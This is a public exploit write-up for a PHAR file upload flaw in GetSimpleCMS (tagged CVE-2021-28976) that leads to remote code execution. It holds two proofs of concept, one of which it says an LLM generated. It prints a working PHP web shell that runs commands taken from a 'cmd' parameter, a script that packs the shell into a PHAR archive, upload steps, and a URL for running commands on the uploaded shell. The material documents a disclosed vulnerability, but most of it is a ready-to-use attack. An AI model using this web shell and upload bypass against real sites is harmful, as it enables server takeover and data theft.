📄 GetSimpleCMS Shell Upload

# Exploit Title: [GetSimpleCMS < 3.3.16 Remote Code Execution via PHAR File Upload in admin/upload.php]
    # Date: [2024-10-26]
    # Exploit Author: [CodeSecLab]
    # Vendor Homepage: [https://github.com/GetSimpleCMS/GetSimpleCMS]
    # Software Link: [https://github.com/GetSimpleCMS/GetSimpleCMS]
    # Version: [3.3.16] 
    # Tested on: [Ubuntu Windows]
    # CVE : [CVE-2021-28976]
    
    PoC-1:
    1)Create a .phar file.
    1. Create the PHP script: Save your code (the one you provided) in a file, say index.php: <?php echo shell_exec($_GET['cmd']); ?>
    2. Write a PHP script to create the .phar file: Use the Phar class in PHP to package the index.php file into a .phar archive. Create a script named create_phar.php as follows:
    <?php
    try {
        // Initialize a new Phar object, name it "archive.phar"
        $phar = new Phar('archive.phar');
    
        // Set the stub (entry point) for the Phar file, pointing to index.php
        $phar->startBuffering();
        $phar->addFromString('index.php', file_get_contents('index.php'));
        $phar->setStub($phar->createDefaultStub('index.php'));
        $phar->stopBuffering();
    
        echo "Phar archive created successfully!";
    } catch (Exception $e) {
        echo "Error: " . $e->getMessage();
    }
    3. Run the script to generate the .phar file: On your terminal (assuming you're using a system that has PHP installed), run the following command to execute the script: php create_phar.php. 
    After running the script, you should find a file named archive.phar in your working directory.
    
    2)Upload file:
    1. Upload the 'archive.phar' file using the vulnerable upload functionality at http://getsimplecms/admin/upload.php. 
    2. You can find the file at http://getsimplecms/data/uploads/.
    
    3)Details:
     "Validation Mechanisms Before Patch": "File extension blacklist and MIME type blacklist were used but lacked specific filtering for 'phar' file types.",
        "Bypass Technique": "Upload a 'phar' file, as it was not included in the original blacklist, which can be treated as a PHP archive by the server for remote code execution.",
        "Request URL": "http://getsimplecms/admin/upload.php",
        "Request Method": "POST",
        "Request Parameters": {
            "file": "<Malicious File>"
        },
    
    
    PoC-2:
    1) LLM creates the file exploit.phar with the following contents:
    malicious.php                                                                                       0000644 0000000 0000000 00000000036 00000000000 010442  0                                                                                                    ustar 00                                                                                                                                                                                                                                                       <?php system($_GET['cmd']); ?>                  
    
    2)
    1. Prepare a PHP file named 'exploit.phar' .\n
    2. Send a POST request to http://getsimplecms/admin/upload.php with the 'exploit.phar' file as the 'file' parameter.\n
    3. Access the uploaded file at http://getsimplecms/data/uploads/exploit.phar and execute commands by passing the 'cmd' parameter (e.g., http://getsimplecms/data/uploads/exploit.phar?cmd=id).
    
    [Replace Your Domain Name]